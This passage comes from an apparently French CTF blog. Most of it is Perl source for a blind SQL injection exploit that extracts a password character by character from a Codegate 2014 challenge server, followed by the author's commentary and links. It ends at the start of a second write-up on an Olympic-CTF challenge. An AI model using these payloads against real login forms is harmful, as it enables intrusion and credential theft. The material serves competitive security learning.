<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: blue;">$getpass</span> <span class="sy0" style="color: #339933;">=</span> url_decode_utf8<span class="br0" style="color: #009900;">(</span><span class="st0" style="color: red;">"'or if(ascii(substr(password,$i,1))>47,1,0) or '0-- -"</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: blue;">$Url</span><span class="sy0" style="color: #339933;">=</span><span class="br0" style="color: #009900;">(</span><span class="st0" style="color: red;">"http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/index.php"</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: blue;">$response</span> <span class="sy0" style="color: #339933;">=</span> <span class="re0" style="color: blue;">$UserAgent</span><span class="sy0" style="color: #339933;">-></span><span class="me1" style="color: #006600;">post</span><span class="br0" style="color: #009900;">(</span> <span class="re0" style="color: blue;">$Url</span><span class="sy0" style="color: #339933;">,</span> <span class="br0" style="color: #009900;">{</span> <span class="st_h" style="color: red;">'password'</span> <span class="sy0" style="color: #339933;">=></span> <span class="re0" style="color: blue;">$getpass</span> <span class="br0" style="color: #009900;">}</span> <span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: blue;">$content</span> <span class="sy0" style="color: #339933;">=</span> <span class="re0" style="color: blue;">$response</span><span class="sy0" style="color: #339933;">-></span><span class="me1" style="color: #006600;">decoded_content</span><span class="br0" style="color: #009900;">(</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">if</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: blue;">$content</span> <span class="sy0" style="color: #339933;">=~</span> <span class="co2" style="color: #009966; font-style: italic;">/True/i</span><span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: #666666; font-style: italic;">#print("Char $i > 47\n");</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
GetValue<span class="br0" style="color: #009900;">(</span><span class="nu0" style="color: #cc66cc;">48</span><span class="sy0" style="color: #339933;">,</span> <span class="nu0" style="color: #cc66cc;">64</span><span class="sy0" style="color: #339933;">,</span> <span class="re0" style="color: blue;">$i</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">next</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">else</span><span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: #666666; font-style: italic;">#print("Char $i < 47\n");</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
GetValue<span class="br0" style="color: #009900;">(</span><span class="nu0" style="color: #cc66cc;">33</span><span class="sy0" style="color: #339933;">,</span> <span class="nu0" style="color: #cc66cc;">47</span><span class="sy0" style="color: #339933;">,</span> <span class="re0" style="color: blue;">$i</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">next</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: #666666; font-style: italic;">#Exemple d'appel de fonction:</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: #666666; font-style: italic;">#GetValue(97, 120, 1);</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">my</span> <span class="re0" style="color: blue;">$fh</span> <span class="sy0" style="color: #339933;">=</span> IO<span class="sy0" style="color: #339933;">::</span><span class="me2" style="color: #006600;">File</span><span class="sy0" style="color: #339933;">-></span><span class="kw2" style="font-weight: bold;">new</span><span class="br0" style="color: #009900;">(</span><span class="st0" style="color: red;">"> WEB500_data"</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">if</span> <span class="br0" style="color: #009900;">(</span><span class="kw3" style="color: #000066;">defined</span> <span class="re0" style="color: blue;">$fh</span><span class="br0" style="color: #009900;">)</span> <span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #000066;">print</span> <span class="re0" style="color: blue;">$fh</span> <span class="re0" style="color: blue;">$Flag</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: blue;">$fh</span><span class="sy0" style="color: #339933;">-></span><span class="kw3" style="color: #000066;">close</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: blue;">$Url</span><span class="sy0" style="color: #339933;">=</span><span class="br0" style="color: #009900;">(</span><span class="st0" style="color: red;">"http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/index.php"</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: blue;">$response</span> <span class="sy0" style="color: #339933;">=</span> <span class="re0" style="color: blue;">$UserAgent</span><span class="sy0" style="color: #339933;">-></span><span class="me1" style="color: #006600;">post</span><span class="br0" style="color: #009900;">(</span> <span class="re0" style="color: blue;">$Url</span><span class="sy0" style="color: #339933;">,</span> <span class="br0" style="color: #009900;">{</span> <span class="st_h" style="color: red;">'password'</span> <span class="sy0" style="color: #339933;">=></span> <span class="re0" style="color: blue;">$Flag</span> <span class="br0" style="color: #009900;">}</span> <span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: blue;">$content</span> <span class="sy0" style="color: #339933;">=</span> <span class="re0" style="color: blue;">$response</span><span class="sy0" style="color: #339933;">-></span><span class="me1" style="color: #006600;">decoded_content</span><span class="br0" style="color: #009900;">(</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #000066;">print</span> <span class="st0" style="color: red;">"<span class="es0" style="color: #000099; font-weight: bold;">\n</span> [Sending $Flag as password] ...<span class="es0" style="color: #000099; font-weight: bold;">\n</span>====== Result :<span class="es0" style="color: #000099; font-weight: bold;">\n</span> $content<span class="es0" style="color: #000099; font-weight: bold;">\n</span>"</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw2" style="font-weight: bold;">sub</span> GetValue<span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">my</span> <span class="br0" style="color: #009900;">(</span><span class="re0" style="color: blue;">$start</span><span class="sy0" style="color: #339933;">,</span> <span class="re0" style="color: blue;">$end</span><span class="sy0" style="color: #339933;">,</span> <span class="re0" style="color: blue;">$position</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">=</span><span class="co5" style="color: blue;">@_</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">for</span> <span class="br0" style="color: #009900;">(</span><span class="re0" style="color: blue;">$start</span><span class="sy0" style="color: #339933;">;</span><span class="re0" style="color: blue;">$start</span> <span class="sy0" style="color: #339933;"><=</span><span class="re0" style="color: blue;">$end</span><span class="sy0" style="color: #339933;">;</span><span class="re0" style="color: blue;">$start</span><span class="sy0" style="color: #339933;">++</span><span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">my</span> <span class="re0" style="color: blue;">$getpass</span> <span class="sy0" style="color: #339933;">=</span> url_decode_utf8<span class="br0" style="color: #009900;">(</span><span class="st0" style="color: red;">"'or if(ascii(substr(password,$position,1))=$start,1,0) or '0-- -"</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">my</span> <span class="re0" style="color: blue;">$Url</span><span class="sy0" style="color: #339933;">=</span><span class="br0" style="color: #009900;">(</span><span class="st0" style="color: red;">"http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/index.php"</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: #666666; font-style: italic;"># DEBBUG:</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: #666666; font-style: italic;"># print("[*]Trying post data: $getpass\n");</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">my</span> <span class="re0" style="color: blue;">$response</span> <span class="sy0" style="color: #339933;">=</span> <span class="re0" style="color: blue;">$UserAgent</span><span class="sy0" style="color: #339933;">-></span><span class="me1" style="color: #006600;">post</span><span class="br0" style="color: #009900;">(</span> <span class="re0" style="color: blue;">$Url</span><span class="sy0" style="color: #339933;">,</span> <span class="br0" style="color: #009900;">{</span> <span class="st_h" style="color: red;">'password'</span> <span class="sy0" style="color: #339933;">=></span> <span class="re0" style="color: blue;">$getpass</span> <span class="br0" style="color: #009900;">}</span> <span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">my</span> <span class="re0" style="color: blue;">$content</span> <span class="sy0" style="color: #339933;">=</span> <span class="re0" style="color: blue;">$response</span><span class="sy0" style="color: #339933;">-></span><span class="me1" style="color: #006600;">decoded_content</span><span class="br0" style="color: #009900;">(</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">if</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: blue;">$content</span> <span class="sy0" style="color: #339933;">=~</span> <span class="co2" style="color: #009966; font-style: italic;">/True/i</span><span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">my</span> <span class="re0" style="color: blue;">$found</span><span class="sy0" style="color: #339933;">=</span><span class="kw3" style="color: #000066;">chr</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: blue;">$start</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: blue;">$Flag</span><span class="sy0" style="color: #339933;">.=</span><span class="re0" style="color: blue;">$found</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #000066;">print</span><span class="br0" style="color: #009900;">(</span><span class="st0" style="color: red;">"[*]FLAG: $Flag<span class="es0" style="color: #000099; font-weight: bold;">\n</span>"</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #000066;">return</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #000066;">return</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: blue;">$Flag</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;"><br /></span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw2" style="font-weight: bold;">__END__</span></div>
</li>
</ol>
<br />
Le script lançait on récupérait rapidement les flags et la request d'authentification était envoyée:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcWdMy79kKEyD8SlSjWRMMRER-iP0vZuEhnq9lLBRTEVNdXR11zDKXeZmcP3Pg9jJPu0DZYzPMW99_gecAtnZ2bwoQrFNSThrAfl7bCQ4H7EWK2rWzqdd37x5JZRKFCDS5G-WeTJrha8OV/s1600/Sqli_pass.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcWdMy79kKEyD8SlSjWRMMRER-iP0vZuEhnq9lLBRTEVNdXR11zDKXeZmcP3Pg9jJPu0DZYzPMW99_gecAtnZ2bwoQrFNSThrAfl7bCQ4H7EWK2rWzqdd37x5JZRKFCDS5G-WeTJrha8OV/s1600/Sqli_pass.png" height="310" width="400" /></a></div>
<br />
Il était H-10 avant la fin du CTF au moment ou je lançait cet exploit et hélas encore mal optimisé notamment dans les requêtes SQL, il n'aura pas pu permettre de validé, une fois de plus ...<br />
<br />
Cependant c'est une excellente base de travail il me semble , ce CTF de part ces épreuves et pas que celle-ci m'aura encore une fois tiré vers le haut alros j'espère que le write-up vous aura plu et pour finir en beauté vous trouverez en fin d'article des liens y compris vers le write up de ce challenge.<br />
<br />
En réalité il était bien plus complexe qu'il n'y parait mais en toute honnêteté avec un peu de temps en plus, on le tombais et j'en suis convaincu !<br />
<br />
Merci à vous amis lecteur ainsi qu'aux membre de l'équipe <b><span style="color: blue;">sec0d</span></b> !!<br />
<br />
<br />
<a href="http://securetty.standard.io/post/77692636735/codegate-2014-ctf-web-120-write-up" target="_blank">Write-up de 120 par 0xBADCA7</a><br />
<a href="https://drive.google.com/file/d/0B0FNzRUV7yjwYnVCeS04YS1YcEU/edit?usp=sharing" target="_blank">Exploit perl par kmkz</a><br />
<a href="http://pastebin.com/A4vmrpZv" target="_blank">code php + html du challenge</a><br />
<a href="https://bugs.php.net/bug.php?id=44366" target="_blank">Bug #44366 de PHP concernant le null byte poisoning / eregi bypassing</a><br />
<br />
<br />
<br />kmkzhttp://www.blogger.com/profile/11354372095868320290noreply@blogger.com1tag:blogger.com,1999:blog-4457623080129847893.post-58074212135260677192014-02-09T18:26:00.006+01:002014-02-09T18:30:12.485+01:00[Write Up] Xnginx: Curling 200 (Olympic-CTF)Le voici, le voila: le fameux Curling200 !!<br />
<br />
Ce challenge (non résolu à temps et pourtant..) avait pour intitulé:<br />
<br />
<div style="background-color: white; box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 10px; text-align: center;">
<span style="color: blue;">flag is there</span></div>
<div style="background-color: white; box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 10px; text-align: center;">
<i style="box-sizing: border-box;"><span style="color: blue;">Flag format: CTF{..32 hexes..}</span></i></div>
<div style="background-color: white; box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 10px; text-align: left;">
Alors.. celui-ci nous aura vraiment fait trés trés mal..</div>
<div style="background-color: white; box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 10px; text-align: left;">
Au début tout allait bien puisqu'aprés quelques recherche la première intuition (lfi) dû à un paramètre qui semblait "suspect" à savoir http://109.233.61.11:27280/news/?<b>retpath=/news/ </b>nous semblait être une piste sérieuse notamment quand un scan sous W3AF nous donna ceci:</div>
<div class="separator" style="clear: both; text-align: center;">
